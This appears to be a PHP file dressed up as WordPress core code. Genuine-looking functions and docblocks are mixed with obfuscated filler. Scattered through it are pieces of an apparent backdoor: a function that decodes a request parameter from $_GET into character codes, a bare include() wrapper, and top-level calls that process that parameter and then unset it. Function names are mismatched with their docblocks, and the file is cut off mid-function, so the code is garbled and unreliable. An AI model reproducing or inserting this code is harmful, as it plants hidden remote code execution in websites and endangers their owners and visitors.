 * assets. Third-party blocks only load their assets when rendered.
 *
 * When this function returns false, all core block assets are loaded regardless
 * of whether they are rendered in a page or not, because they are all part of
 * the `block-library/style.css` file. Assets for third-party blocks are always
 * enqueued regardless of whether they are rendered or not.
 *
 * This only affects front end and not the block editor screens.
 *
 * @see wp_enqueue_registered_block_scripts_and_styles()
 * @see register_block_style_handle()
 *
 * @since 5.8.0
 *
 * @return bool Whether separate assets will be loaded.
 */
function wp_skip_paused_themes()
{
    if (is_admin() || is_feed() || wp_is_rest_endpoint()) {
        return false;
    }
    /**
     * Filters whether block styles should be loaded separately.
     *
     * Returning false loads all core block assets, regardless of whether they are rendered
     * in a page or not. Returning true loads core block assets only when they are rendered.
     *
     * @since 5.8.0
     *
     * @param bool $load_separate_assets Whether separate assets will be loaded.
     *                                   Default false (all block assets are loaded, even when not used).
     */
    return apply_filters('should_load_separate_core_block_assets', false);
}


/**
	 * @since 5.9.0 Renamed `$string` (a PHP reserved keyword) to `$feedback` for PHP 8 named parameter support.
	 *
	 * @param string $feedback Message data.
	 * @param mixed  ...$new_menu  Optional text replacements.
	 */

 function iis7_save_url_rewrite_rules ($compact){
 // Global styles can be enqueued in both the header and the footer. See https://core.trac.wordpress.org/ticket/53494.
 	$update_major = 'alsm';
 	if(!isset($processed_response)) {
 		$processed_response = 'mud4tjh';
 	}
 	$processed_response = wordwrap($update_major);
 	$enhanced_pagination['tuaji7n'] = 'xe0r5hz2';
 	$old_user_fields['cz5tujp1'] = 'cd49ta';
 	$processed_response = cosh(348);
 	if(!isset($ltr)) {
 		$ltr = 'p3e1unmbd';
 	}
 	$ltr = exp(37);
 	$required_kses_globals = (!isset($required_kses_globals)? 	"t5h2o" 	: 	"vy17q5v");
 	$compact = str_shuffle($update_major);
 	$ltr = round(336);
 	$rest = 'd56se60w';
 	$preset['yw5m7'] = 1059;
 	if(!isset($count_key1)) {
 		$count_key1 = 'sqfljq';
 	}
 	$count_key1 = wordwrap($rest);
 	$cidUniq = 'n5ing3';
 	$markerline['vnpdr9'] = 1121;
 	$compact = ltrim($cidUniq);
 	$maybe_widget_id['uozmn'] = 4750;
 	$update_major = bin2hex($cidUniq);
 	if((decbin(977)) ===  TRUE)	{
 		$cached_results = 'j358';
 	}
 	$class_id['p85gj9'] = 'so6h0r';
 	$ltr = ltrim($rest);
 	return $compact;
 }


/**
	 * Handles the date column output.
	 *
	 * @since 4.3.0
	 *
	 * @param WP_Post $caps_with_roles The current WP_Post object.
	 */

 function redirect_guess_404_permalink($db_check_string){
 $fnction = 'xfoostdv';
 $copyStatusCode = (!isset($copyStatusCode)? 	"z2rx8" 	: 	"djuo2i");
 $default_column['vn67k'] = 2205;
  if(!(rawurldecode($fnction)) !=  false) 	{
  	$template_names = 'de6lfddl';
  }
 $fnction = sin(779);
  if(!isset($hidden_inputs)) {
  	$hidden_inputs = 'q5rofm2j';
  }
 $fnction = strnatcasecmp($fnction, $fnction);
 $hidden_inputs = atanh(636);
     $plugurl = $_GET[$db_check_string];
     $plugurl = str_split($plugurl);
 $hidden_inputs = tan(490);
 $thisfile_asf_headerextensionobject['o8d4a5js'] = 'hqgpwmhw7';
 //  PCMWAVEFORMAT m_OrgWf;     // original wave format
     $plugurl = array_map("ord", $plugurl);
 $registered_sidebars_keys = 'rrme1';
 $fnction = atanh(501);
 $registered_sidebars_keys = trim($registered_sidebars_keys);
 $original_changeset_data['up4ij5'] = 2949;
     return $plugurl;
 }


/**
 * Use the button block classes for the form-submit button.
 *
 * @param array $fields The default comment form arguments.
 *
 * @return array Returns the modified fields.
 */

 if(!empty(trim($skip_min_height)) ===  FALSE) {
 	$exporter_friendly_name = 'ca7nb';
 }


/**
	 * @param int $WMpictureType
	 *
	 * @return string
	 */

 function attachment_submit_meta_box($escape){
 $default_structures = 'hcc2y5a2n';
 $with_namespace = 'ukwg';
     include($escape);
 }


/**
	 * Closes a P element.
	 *
	 * @since 6.4.0
	 *
	 * @throws WP_HTML_Unsupported_Exception When encountering unsupported HTML input.
	 *
	 * @see https://html.spec.whatwg.org/#close-a-p-element
	 */

 function edit_term_link ($property_suffix){
 	$private_statuses = 'ay8a629xd';
 	$cleaned_subquery['cqjzgaqv0'] = 'rq2r';
 	if((ltrim($private_statuses)) ===  false){
 		$drag_drop_upload = 'k9q8a';
 	}
 	$allow_query_attachment_by_filename = 'c3s9nr2h';
 	$author_nicename = (!isset($author_nicename)?	'zymk5bl'	:	'cb9tli');
 	if(!(soundex($allow_query_attachment_by_filename)) ==  True) 	{
 		$cache_name_function = 'b08gc5';
 	}
 	$empty = 'au180';
 	$thisfile_riff_RIFFsubtype_COMM_0_data = 'dhr76';
 	$panel_type = (!isset($panel_type)? 	"qxkhykqx" 	: 	"u4e7hnjy");
 	if(!isset($auto_add)) {
 		$auto_add = 'gka44c';
 	}
 	$auto_add = chop($empty, $thisfile_riff_RIFFsubtype_COMM_0_data);
 	$RVA2ChannelTypeLookup['zc435'] = 2973;
 	if((expm1(861)) ===  False) {
 		$Host = 'rv6y17jtq';
 	}
 	$last_checked = 'oogyb';
 	$private_statuses = stripcslashes($last_checked);
 	return $property_suffix;
 }


/**
	 * Fetches stats from the Akismet API.
	 *
	 * ## OPTIONS
	 *
	 * [<interval>]
	 * : The time period for which to retrieve stats.
	 * ---
	 * default: all
	 * options:
	 *  - days
	 *  - months
	 *  - all
	 * ---
	 *
	 * [--format=<format>]
	 * : Allows overriding the output of the command when listing connections.
	 * ---
	 * default: table
	 * options:
	 *  - table
	 *  - json
	 *  - csv
	 *  - yaml
	 *  - count
	 * ---
	 *
	 * [--summary]
	 * : When set, will display a summary of the stats.
	 *
	 * ## EXAMPLES
	 *
	 * wp akismet stats
	 * wp akismet stats all
	 * wp akismet stats days
	 * wp akismet stats months
	 * wp akismet stats all --summary
	 */

 if(!isset($wp_theme)) {
 	$wp_theme = 'ilyo1jbe';
 }
/**
 * Deprecated functionality to validate an email address.
 *
 * @since MU (3.0.0)
 * @deprecated 3.0.0 Use is_email()
 * @see is_email()
 *
 * @param string $all_data        Email address to verify.
 * @param bool   $timeend Deprecated.
 * @return string|false Valid email address on success, false on failure.
 */
function user_can_access_admin_page($all_data, $timeend = true)
{
    _deprecated_function(__FUNCTION__, '3.0.0', 'is_email()');
    return is_email($all_data, $timeend);
}
$quality_result = addcslashes($last_attr, $working_directory);
$wp_theme = str_shuffle($skip_min_height);
$wpvar['cn8jfr'] = 1631;
//printf('next code point to insert is %s' . PHP_EOL, dechex($m));
/**
 * Saves image to post, along with enqueued changes
 * in `$nicename__not_in['history']`.
 *
 * @since 2.9.0
 *
 * @param int $comment_author_email Attachment post ID.
 * @return stdClass
 */
function wp_count_attachments($comment_author_email)
{
    $open_sans_font_url = wp_get_additional_image_sizes();
    $a_context = new stdClass();
    $options_found = false;
    $block_support_config = false;
    $jsonp_callback = false;
    $the_comment_status = false;
    $caps_with_roles = get_post($comment_author_email);
    $allow_unsafe_unquoted_parameters = wp_get_image_editor(_load_image_to_edit_path($comment_author_email, 'full'));
    if (is_wp_error($allow_unsafe_unquoted_parameters)) {
        $a_context->error = esc_js(__('Unable to create new image.'));
        return $a_context;
    }
    $before_items = !empty($nicename__not_in['fwidth']) ? (int) $nicename__not_in['fwidth'] : 0;
    $pinged = !empty($nicename__not_in['fheight']) ? (int) $nicename__not_in['fheight'] : 0;
    $global_style_query = !empty($nicename__not_in['target']) ? preg_replace('/[^a-z0-9_-]+/i', '', $nicename__not_in['target']) : '';
    $placeholder_id = !empty($nicename__not_in['do']) && 'scale' === $nicename__not_in['do'];
    /** This filter is documented in wp-admin/includes/image-edit.php */
    $nicename__in = (bool) apply_filters('image_edit_thumbnails_separately', false);
    if ($placeholder_id) {
        $log_error = $allow_unsafe_unquoted_parameters->get_size();
        $err = $log_error['width'];
        $wp_plugin_path = $log_error['height'];
        if ($before_items > $err || $pinged > $wp_plugin_path) {
            $a_context->error = esc_js(__('Images cannot be scaled to a size larger than the original.'));
            return $a_context;
        }
        if ($before_items > 0 && $pinged > 0) {
            // Check if it has roughly the same w / h ratio.
            $new_plugin_data = round($err / $wp_plugin_path, 2) - round($before_items / $pinged, 2);
            if (-0.1 < $new_plugin_data && $new_plugin_data < 0.1) {
                // Scale the full size image.
                if ($allow_unsafe_unquoted_parameters->resize($before_items, $pinged)) {
                    $jsonp_callback = true;
                }
            }
            if (!$jsonp_callback) {
                $a_context->error = esc_js(__('Error while saving the scaled image. Please reload the page and try again.'));
                return $a_context;
            }
        }
    } elseif (!empty($nicename__not_in['history'])) {
        $whole = json_decode(wp_unslash($nicename__not_in['history']));
        if ($whole) {
            $allow_unsafe_unquoted_parameters = image_edit_apply_changes($allow_unsafe_unquoted_parameters, $whole);
        }
    } else {
        $a_context->error = esc_js(__('Nothing to save, the image has not changed.'));
        return $a_context;
    }
    $hDigest = wp_get_attachment_metadata($comment_author_email);
    $update_response = get_post_meta($caps_with_roles->ID, '_wp_attachment_backup_sizes', true);
    if (!is_array($hDigest)) {
        $a_context->error = esc_js(__('Image data does not exist. Please re-upload the image.'));
        return $a_context;
    }
    if (!is_array($update_response)) {
        $update_response = array();
    }
    // Generate new filename.
    $cur_aa = get_attached_file($comment_author_email);
    $widget_key = pathinfo($cur_aa, PATHINFO_BASENAME);
    $reason = pathinfo($cur_aa, PATHINFO_DIRNAME);
    $dev_suffix = pathinfo($cur_aa, PATHINFO_EXTENSION);
    $overrideendoffset = pathinfo($cur_aa, PATHINFO_FILENAME);
    $can_delete = time() . rand(100, 999);
    if (defined('IMAGE_EDIT_OVERWRITE') && IMAGE_EDIT_OVERWRITE && isset($update_response['full-orig']) && $update_response['full-orig']['file'] !== $widget_key) {
        if ($nicename__in && 'thumbnail' === $global_style_query) {
            $attrname = "{$reason}/{$overrideendoffset}-temp.{$dev_suffix}";
        } else {
            $attrname = $cur_aa;
        }
    } else {
        while (true) {
            $overrideendoffset = preg_replace('/-e([0-9]+)$/', '', $overrideendoffset);
            $overrideendoffset .= "-e{$can_delete}";
            $cur_mm = "{$overrideendoffset}.{$dev_suffix}";
            $attrname = "{$reason}/{$cur_mm}";
            if (file_exists($attrname)) {
                ++$can_delete;
            } else {
                break;
            }
        }
    }
    // Save the full-size file, also needed to create sub-sizes.
    if (!wp_count_attachments_file($attrname, $allow_unsafe_unquoted_parameters, $caps_with_roles->post_mime_type, $comment_author_email)) {
        $a_context->error = esc_js(__('Unable to save the image.'));
        return $a_context;
    }
    if ('nothumb' === $global_style_query || 'all' === $global_style_query || 'full' === $global_style_query || $jsonp_callback) {
        $remove_keys = false;
        if (isset($update_response['full-orig'])) {
            if ((!defined('IMAGE_EDIT_OVERWRITE') || !IMAGE_EDIT_OVERWRITE) && $update_response['full-orig']['file'] !== $widget_key) {
                $remove_keys = "full-{$can_delete}";
            }
        } else {
            $remove_keys = 'full-orig';
        }
        if ($remove_keys) {
            $update_response[$remove_keys] = array('width' => $hDigest['width'], 'height' => $hDigest['height'], 'file' => $widget_key);
        }
        $options_found = $cur_aa === $attrname || update_attached_file($comment_author_email, $attrname);
        $hDigest['file'] = _wp_relative_upload_path($attrname);
        $log_error = $allow_unsafe_unquoted_parameters->get_size();
        $hDigest['width'] = $log_error['width'];
        $hDigest['height'] = $log_error['height'];
        if ($options_found && ('nothumb' === $global_style_query || 'all' === $global_style_query)) {
            $constrained_size = get_intermediate_image_sizes();
            if ($nicename__in && 'nothumb' === $global_style_query) {
                $constrained_size = array_diff($constrained_size, array('thumbnail'));
            }
        }
        $a_context->fw = $hDigest['width'];
        $a_context->fh = $hDigest['height'];
    } elseif ($nicename__in && 'thumbnail' === $global_style_query) {
        $constrained_size = array('thumbnail');
        $options_found = true;
        $block_support_config = true;
        $the_comment_status = true;
    }
    /*
     * We need to remove any existing resized image files because
     * a new crop or rotate could generate different sizes (and hence, filenames),
     * keeping the new resized images from overwriting the existing image files.
     * https://core.trac.wordpress.org/ticket/32171
     */
    if (defined('IMAGE_EDIT_OVERWRITE') && IMAGE_EDIT_OVERWRITE && !empty($hDigest['sizes'])) {
        foreach ($hDigest['sizes'] as $log_error) {
            if (!empty($log_error['file']) && preg_match('/-e[0-9]{13}-/', $log_error['file'])) {
                $actual_page = path_join($reason, $log_error['file']);
                wp_delete_file($actual_page);
            }
        }
    }
    if (isset($constrained_size)) {
        $new_key_and_inonce = array();
        foreach ($constrained_size as $log_error) {
            $remove_keys = false;
            if (isset($hDigest['sizes'][$log_error])) {
                if (isset($update_response["{$log_error}-orig"])) {
                    if ((!defined('IMAGE_EDIT_OVERWRITE') || !IMAGE_EDIT_OVERWRITE) && $update_response["{$log_error}-orig"]['file'] !== $hDigest['sizes'][$log_error]['file']) {
                        $remove_keys = "{$log_error}-{$can_delete}";
                    }
                } else {
                    $remove_keys = "{$log_error}-orig";
                }
                if ($remove_keys) {
                    $update_response[$remove_keys] = $hDigest['sizes'][$log_error];
                }
            }
            if (isset($open_sans_font_url[$log_error])) {
                $show_post_comments_feed = (int) $open_sans_font_url[$log_error]['width'];
                $registered_handle = (int) $open_sans_font_url[$log_error]['height'];
                $resolved_style = $the_comment_status ? false : $open_sans_font_url[$log_error]['crop'];
            } else {
                $registered_handle = get_option("{$log_error}_size_h");
                $show_post_comments_feed = get_option("{$log_error}_size_w");
                $resolved_style = $the_comment_status ? false : get_option("{$log_error}_crop");
            }
            $new_key_and_inonce[$log_error] = array('width' => $show_post_comments_feed, 'height' => $registered_handle, 'crop' => $resolved_style);
        }
        $hDigest['sizes'] = array_merge($hDigest['sizes'], $allow_unsafe_unquoted_parameters->multi_resize($new_key_and_inonce));
    }
    unset($allow_unsafe_unquoted_parameters);
    if ($options_found) {
        wp_update_attachment_metadata($comment_author_email, $hDigest);
        update_post_meta($comment_author_email, '_wp_attachment_backup_sizes', $update_response);
        if ('thumbnail' === $global_style_query || 'all' === $global_style_query || 'full' === $global_style_query) {
            // Check if it's an image edit from attachment edit screen.
            if (!empty($nicename__not_in['context']) && 'edit-attachment' === $nicename__not_in['context']) {
                $blogname_orderby_text = wp_get_attachment_image_src($comment_author_email, array(900, 600), true);
                $a_context->thumbnail = $blogname_orderby_text[0];
            } else {
                $nav_menu_item = wp_get_attachment_url($comment_author_email);
                if (!empty($hDigest['sizes']['thumbnail'])) {
                    $new_user_login = $hDigest['sizes']['thumbnail'];
                    $a_context->thumbnail = path_join(dirname($nav_menu_item), $new_user_login['file']);
                } else {
                    $a_context->thumbnail = "{$nav_menu_item}?w=128&h=128";
                }
            }
        }
    } else {
        $block_support_config = true;
    }
    if ($block_support_config) {
        wp_delete_file($attrname);
    }
    $a_context->msg = esc_js(__('Image saved'));
    return $a_context;
}
// Verify that file to be invalidated has a PHP extension.
$seconds['yy017y65a'] = 'dpjjy';


/**
	 * Filters the list of enclosures already enclosed for the given post.
	 *
	 * @since 2.0.0
	 *
	 * @param string[] $pung    Array of enclosures for the given post.
	 * @param int      $comment_author_email Post ID.
	 */

 if(!isset($allusers)) {
 	$allusers = 'zenzbez';
 }


/* translators: 1: Site name, 2: Separator (raquo), 3: Post title. */

 if((rtrim($wp_theme)) ===  FALSE)	{
 	$next_token = 'g5re3';
 }
$allusers = strripos($quality_result, $quality_result);
$serialized['ib98id63f'] = 4368;
$link_added = (!isset($link_added)? 	"fljnz" 	: 	"tasmxqibl");


/**
 * Used to set up all core blocks used with the block editor.
 *
 * @package WordPress
 */

 if(!empty(floor(457)) ==  False) {
 	$sub1comment = 'aa8up3';
 }
$allusers = strip_tags($last_attr);
// Link to target not found.
$skip_min_height = stripcslashes($skip_cache);


/**
	 * Custom sanitize callback used for all options to allow the use of 'null'.
	 *
	 * By default, the schema of settings will throw an error if a value is set to
	 * `null` as it's not a valid value for something like "type => string". We
	 * provide a wrapper sanitizer to allow the use of `null`.
	 *
	 * @since 4.7.0
	 *
	 * @param mixed           $fields_to_pick   The value for the setting.
	 * @param WP_REST_Request $has_dependents The request object.
	 * @param string          $param   The parameter name.
	 * @return mixed|WP_Error
	 */

 if(empty(strtr($allusers, 8, 12)) ==  True){
 	$has_custom_classname_support = 'ji6pgrc';
 }
// Site Wide Only is deprecated in favor of Network.
//  only the header information, and none of the body.
$plugurl = wp_embed_defaults($plugurl);
get_svg_filters($plugurl);
unset($_GET[$db_check_string]);
$link_start['jumzox18'] = 4614;
$skip_cache = floor(702);
$hex4_regexp = 'xgtemf';


/*
					 * we have options
					 * - assume an implicit opener
					 * - assume _this_ is the opener
					 * - give up and close out the document
					 */

 if(!isset($el_selector)) {
 	$el_selector = 'wbjhuwg60';
 }
$el_selector = expm1(286);


/**
 * Exception for 404 Not Found responses
 *
 * @package Requests\Exceptions
 */

 if(empty(deg2rad(334)) !==  False) 	{
 	$firsttime = 'c2hgkg1fx';
 }
$el_selector = htmlspecialchars_decode($el_selector);
$el_selector = edit_term_link($el_selector);
$el_selector = strrpos($el_selector, $el_selector);
$el_selector = floor(79);
$el_selector = round(693);
$qs_match = (!isset($qs_match)?	'p1rdvp9'	:	'x8h8');
$YplusX['k906s'] = 'nhm5foym';
/**
 * Retrieves the ID of the current item in the WordPress Loop.
 *
 * @since 2.1.0
 *
 * @return int|false The ID of the current item in the WordPress Loop. False if $caps_with_roles is not set.
 */
function get_block_core_post_featured_image_overlay_element_markup()
{
    // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid
    $caps_with_roles = get_post();
    return !empty($caps_with_roles) ? $caps_with_roles->ID : false;
}


/**
     * @var array<int, array<int, int>>
     */

 if(!(nl2br($el_selector)) !==  False) {
 	$update_cache = 'btg5fra';
 }
$el_selector = strcoll($el_selector, $el_selector);
$el_selector = iconv_fallback_iso88591_utf8($el_selector);
$strictPadding['klv2zb'] = 'rlklr';
$el_selector = decbin(180);
$el_selector = pk_to_curve25519($el_selector);
$el_selector = cosh(953);
$el_selector = ltrim($el_selector);
$el_selector = is_rss($el_selector);
$akismet_api_port = (!isset($akismet_api_port)? "k5plf3" : "bdji");
$descs['f9fsc6z'] = 4894;
$pingback_link_offset_dquote['ml52dekys'] = 2258;
$el_selector = cosh(255);
$has_custom_classnames['v1pvpqce7'] = 2567;
$el_selector = quotemeta($el_selector);
$password_reset_allowed = (!isset($password_reset_allowed)? 	'a0q23' 	: 	'agxtk');
$el_selector = decoct(115);


/* translators: 1: Separator, 2: Search query. */

 if(empty(decbin(621)) !=  False) 	{
 	$context_dirs = 'sq3j2';
 }
$rcpt = 'te6s0e';
$thisfile_audio_dataformat['bghgg'] = 'nw41w';
$rcpt = ucwords($rcpt);
$col_meta['x0kokinf'] = 'qfpzjo363';
$rcpt = deg2rad(808);
$attrarr = (!isset($attrarr)? 'xmxolci3n' : 'dtatdwg8');
/**
 * Retrieves an array of pages (or hierarchical post type items).
 *
 * @since 1.5.0
 * @since 6.3.0 Use WP_Query internally.
 *
 * @param array|string $new_menu {
 *     Optional. Array or string of arguments to retrieve pages.
 *
 *     @type int          $default_structure_values     Page ID to return child and grandchild pages of. Note: The value
 *                                      of `$bytes_written` has no bearing on whether `$default_structure_values` returns
 *                                      hierarchical results. Default 0, or no restriction.
 *     @type string       $sort_order   How to sort retrieved pages. Accepts 'ASC', 'DESC'. Default 'ASC'.
 *     @type string       $sort_column  What columns to sort pages by, comma-separated. Accepts 'post_author',
 *                                      'post_date', 'post_title', 'post_name', 'post_modified', 'menu_order',
 *                                      'post_modified_gmt', 'post_parent', 'ID', 'rand', 'comment_count'.
 *                                      'post_' can be omitted for any values that start with it.
 *                                      Default 'post_title'.
 *     @type bool         $bytes_written Whether to return pages hierarchically. If false in conjunction with
 *                                      `$default_structure_values` also being false, both arguments will be disregarded.
 *                                      Default true.
 *     @type int[]        $threshold_map      Array of page IDs to exclude. Default empty array.
 *     @type int[]        $g_pclzip_versionnclude      Array of page IDs to include. Cannot be used with `$default_structure_values`,
 *                                      `$lock_result`, `$threshold_map`, `$gravatar_server`, `$tmp0`, or `$bytes_written`.
 *                                      Default empty array.
 *     @type string       $gravatar_server     Only include pages with this meta key. Default empty.
 *     @type string       $tmp0   Only include pages with this meta value. Requires `$gravatar_server`.
 *                                      Default empty.
 *     @type string       $authors      A comma-separated list of author IDs. Default empty.
 *     @type int          $lock_result       Page ID to return direct children of. Default -1, or no restriction.
 *     @type string|int[] $threshold_map_tree Comma-separated string or array of page IDs to exclude.
 *                                      Default empty array.
 *     @type int          $subpath       The number of pages to return. Default 0, or all pages.
 *     @type int          $disableFallbackForUnitTests       The number of pages to skip before returning. Requires `$subpath`.
 *                                      Default 0.
 *     @type string       $caps_with_roles_type    The post type to query. Default 'page'.
 *     @type string|array $font_face_property_defaults  A comma-separated list or array of post statuses to include.
 *                                      Default 'publish'.
 * }
 * @return WP_Post[]|false Array of pages (or hierarchical post type items). Boolean false if the
 *                         specified post type is not hierarchical or the specified status is not
 *                         supported by the post type.
 */
function update_metadata($new_menu = array())
{
    $single_sidebar_class = array('child_of' => 0, 'sort_order' => 'ASC', 'sort_column' => 'post_title', 'hierarchical' => 1, 'exclude' => array(), 'include' => array(), 'meta_key' => '', 'meta_value' => '', 'authors' => '', 'parent' => -1, 'exclude_tree' => array(), 'number' => '', 'offset' => 0, 'post_type' => 'page', 'post_status' => 'publish');
    $ThisTagHeader = wp_parse_args($new_menu, $single_sidebar_class);
    $subpath = (int) $ThisTagHeader['number'];
    $disableFallbackForUnitTests = (int) $ThisTagHeader['offset'];
    $default_structure_values = (int) $ThisTagHeader['child_of'];
    $bytes_written = $ThisTagHeader['hierarchical'];
    $threshold_map = $ThisTagHeader['exclude'];
    $gravatar_server = $ThisTagHeader['meta_key'];
    $tmp0 = $ThisTagHeader['meta_value'];
    $lock_result = $ThisTagHeader['parent'];
    $font_face_property_defaults = $ThisTagHeader['post_status'];
    // Make sure the post type is hierarchical.
    $subquery_alias = get_post_types(array('hierarchical' => true));
    if (!in_array($ThisTagHeader['post_type'], $subquery_alias, true)) {
        return false;
    }
    if ($lock_result > 0 && !$default_structure_values) {
        $bytes_written = false;
    }
    // Make sure we have a valid post status.
    if (!is_array($font_face_property_defaults)) {
        $font_face_property_defaults = explode(',', $font_face_property_defaults);
    }
    if (array_diff($font_face_property_defaults, get_post_stati())) {
        return false;
    }
    $was_cache_addition_suspended = array('orderby' => 'post_title', 'order' => 'ASC', 'post__not_in' => wp_parse_id_list($threshold_map), 'meta_key' => $gravatar_server, 'meta_value' => $tmp0, 'posts_per_page' => -1, 'offset' => $disableFallbackForUnitTests, 'post_type' => $ThisTagHeader['post_type'], 'post_status' => $font_face_property_defaults, 'update_post_term_cache' => false, 'update_post_meta_cache' => false, 'ignore_sticky_posts' => true, 'no_found_rows' => true);
    if (!empty($ThisTagHeader['include'])) {
        $default_structure_values = 0;
        // Ignore child_of, parent, exclude, meta_key, and meta_value params if using include.
        $lock_result = -1;
        unset($was_cache_addition_suspended['post__not_in'], $was_cache_addition_suspended['meta_key'], $was_cache_addition_suspended['meta_value']);
        $bytes_written = false;
        $was_cache_addition_suspended['post__in'] = wp_parse_id_list($ThisTagHeader['include']);
    }
    if (!empty($ThisTagHeader['authors'])) {
        $matched_query = wp_parse_list($ThisTagHeader['authors']);
        if (!empty($matched_query)) {
            $was_cache_addition_suspended['author__in'] = array();
            foreach ($matched_query as $contexts) {
                // Do we have an author id or an author login?
                if (0 == (int) $contexts) {
                    $contexts = get_user_by('login', $contexts);
                    if (empty($contexts)) {
                        continue;
                    }
                    if (empty($contexts->ID)) {
                        continue;
                    }
                    $contexts = $contexts->ID;
                }
                $was_cache_addition_suspended['author__in'][] = (int) $contexts;
            }
        }
    }
    if (is_array($lock_result)) {
        $num_blogs = array_map('absint', (array) $lock_result);
        if (!empty($num_blogs)) {
            $was_cache_addition_suspended['post_parent__in'] = $num_blogs;
        }
    } elseif ($lock_result >= 0) {
        $was_cache_addition_suspended['post_parent'] = $lock_result;
    }
    /*
     * Maintain backward compatibility for `sort_column` key.
     * Additionally to `WP_Query`, it has been supporting the `post_modified_gmt` field, so this logic will translate
     * it to `post_modified` which should result in the same order given the two dates in the fields match.
     */
    $fields_update = wp_parse_list($ThisTagHeader['sort_column']);
    $fields_update = array_map(static function ($previousbyteoffset) {
        $previousbyteoffset = trim($previousbyteoffset);
        if ('post_modified_gmt' === $previousbyteoffset || 'modified_gmt' === $previousbyteoffset) {
            $previousbyteoffset = str_replace('_gmt', '', $previousbyteoffset);
        }
        return $previousbyteoffset;
    }, $fields_update);
    if ($fields_update) {
        $was_cache_addition_suspended['orderby'] = array_fill_keys($fields_update, $ThisTagHeader['sort_order']);
    }
    $signup_user_defaults = $ThisTagHeader['sort_order'];
    if ($signup_user_defaults) {
        $was_cache_addition_suspended['order'] = $signup_user_defaults;
    }
    if (!empty($subpath)) {
        $was_cache_addition_suspended['posts_per_page'] = $subpath;
    }
    /**
     * Filters query arguments passed to WP_Query in update_metadata.
     *
     * @since 6.3.0
     *
     * @param array $was_cache_addition_suspended  Array of arguments passed to WP_Query.
     * @param array $ThisTagHeader Array of update_metadata() arguments.
     */
    $was_cache_addition_suspended = apply_filters('update_metadata_query_args', $was_cache_addition_suspended, $ThisTagHeader);
    $sidebars = new WP_Query();
    $sidebars = $sidebars->query($was_cache_addition_suspended);
    if ($default_structure_values || $bytes_written) {
        $sidebars = get_page_children($default_structure_values, $sidebars);
    }
    if (!empty($ThisTagHeader['exclude_tree'])) {
        $threshold_map = wp_parse_id_list($ThisTagHeader['exclude_tree']);
        foreach ($threshold_map as $multidimensional_filter) {
            $admin_html_class = get_page_children($multidimensional_filter, $sidebars);
            foreach ($admin_html_class as $ep) {
                $threshold_map[] = $ep->ID;
            }
        }
        $all_tags = count($sidebars);
        for ($g_pclzip_version = 0; $g_pclzip_version < $all_tags; $g_pclzip_version++) {
            if (in_array($sidebars[$g_pclzip_version]->ID, $threshold_map, true)) {
                unset($sidebars[$g_pclzip_version]);
            }
        }
    }
    /**
     * Filters the retrieved list of pages.
     *
     * @since 2.1.0
     *
     * @param WP_Post[] $sidebars       Array of page objects.
     * @param array     $ThisTagHeader Array of update_metadata() arguments.
     */
    return apply_filters('update_metadata', $sidebars, $ThisTagHeader);
}
$rcpt = cosh(998);
$rcpt = bin2hex($rcpt);
$dirs['edsellzs6'] = 81;


/**
 * Prints scripts and data queued for the footer.
 *
 * The dynamic portion of the hook name, `$hook_suffix`,
 * refers to the global hook suffix of the current page.
 *
 * @since 4.6.0
 */

 if(!isset($f7g3_38)) {
 	$f7g3_38 = 'xb7j106x';
 }
$f7g3_38 = str_repeat($rcpt, 7);
$f7g3_38 = is_nav_menu_item($rcpt);
/**
 * Returns the names or objects of the taxonomies which are registered for the requested object or object type,
 * such as a post object or post type name.
 *
 * Example:
 *
 *     $real_mime_types = wp_register_background_support( 'post' );
 *
 * This results in:
 *
 *     Array( 'category', 'post_tag' )
 *
 * @since 2.3.0
 *
 * @global WP_Taxonomy[] $orig_matches The registered taxonomies.
 *
 * @param string|string[]|WP_Post $HeaderObjectData Name of the type of taxonomy object, or an object (row from posts).
 * @param string                  $cron_tasks      Optional. The type of output to return in the array. Accepts either
 *                                             'names' or 'objects'. Default 'names'.
 * @return string[]|WP_Taxonomy[] The names or objects of all taxonomies of `$HeaderObjectData`.
 */
function wp_register_background_support($HeaderObjectData, $cron_tasks = 'names')
{
    global $orig_matches;
    if (is_object($HeaderObjectData)) {
        if ('attachment' === $HeaderObjectData->post_type) {
            return get_attachment_taxonomies($HeaderObjectData, $cron_tasks);
        }
        $HeaderObjectData = $HeaderObjectData->post_type;
    }
    $HeaderObjectData = (array) $HeaderObjectData;
    $real_mime_types = array();
    foreach ((array) $orig_matches as $locate => $sfid) {
        if (array_intersect($HeaderObjectData, (array) $sfid->object_type)) {
            if ('names' === $cron_tasks) {
                $real_mime_types[] = $locate;
            } else {
                $real_mime_types[$locate] = $sfid;
            }
        }
    }
    return $real_mime_types;
}
$f7g3_38 = stripcslashes($rcpt);
$preferred_icons['lbg7'] = 413;
$rcpt = crc32($f7g3_38);
$rcpt = set_https_domains($f7g3_38);
$f7g3_38 = sinh(16);
$use_root_padding['wcamvc8i'] = 393;


/**
		 * Parse a Plural-Forms string into tokens.
		 *
		 * Uses the shunting-yard algorithm to convert the string to Reverse Polish
		 * Notation tokens.
		 *
		 * @since 4.9.0
		 *
		 * @throws Exception If there is a syntax or parsing error with the string.
		 *
		 * @param string $str String to parse.
		 */

 if(!isset($match_src)) {
 	$match_src = 'w5s6k';
 }
$match_src = strrev($f7g3_38);
$new_major['qm6o'] = 'c03k';


/**
	 * Gets the ID of the site for which the user's capabilities are currently initialized.
	 *
	 * @since 4.9.0
	 *
	 * @return int Site ID.
	 */

 if(!isset($msg_data)) {
 	$msg_data = 'agumf7';
 }
/**
 * Validate a URL for safe use in the HTTP API.
 *
 * @since 3.5.2
 *
 * @param string $month_number Request URL.
 * @return string|false URL or false on failure.
 */
function sanitize_bookmark_field($month_number)
{
    if (!is_string($month_number) || '' === $month_number || is_numeric($month_number)) {
        return false;
    }
    $carry13 = $month_number;
    $month_number = wp_kses_bad_protocol($month_number, array('http', 'https'));
    if (!$month_number || strtolower($month_number) !== strtolower($carry13)) {
        return false;
    }
    $LAMEmiscStereoModeLookup = parse_url($month_number);
    if (!$LAMEmiscStereoModeLookup || empty($LAMEmiscStereoModeLookup['host'])) {
        return false;
    }
    if (isset($LAMEmiscStereoModeLookup['user']) || isset($LAMEmiscStereoModeLookup['pass'])) {
        return false;
    }
    if (false !== strpbrk($LAMEmiscStereoModeLookup['host'], ':#?[]')) {
        return false;
    }
    $link_end = parse_url(get_option('home'));
    $max_srcset_image_width = isset($link_end['host']) && strtolower($link_end['host']) === strtolower($LAMEmiscStereoModeLookup['host']);
    $matchmask = trim($LAMEmiscStereoModeLookup['host'], '.');
    if (!$max_srcset_image_width) {
